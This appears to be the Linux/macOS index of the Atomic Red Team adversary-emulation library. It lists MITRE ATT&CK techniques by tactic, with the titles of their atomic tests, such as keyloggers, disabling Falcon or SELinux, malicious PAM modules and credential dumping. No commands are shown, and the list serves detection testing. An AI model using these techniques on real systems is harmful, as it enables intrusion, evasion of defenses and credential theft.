- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #2: Space After Filename [macos, linux]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
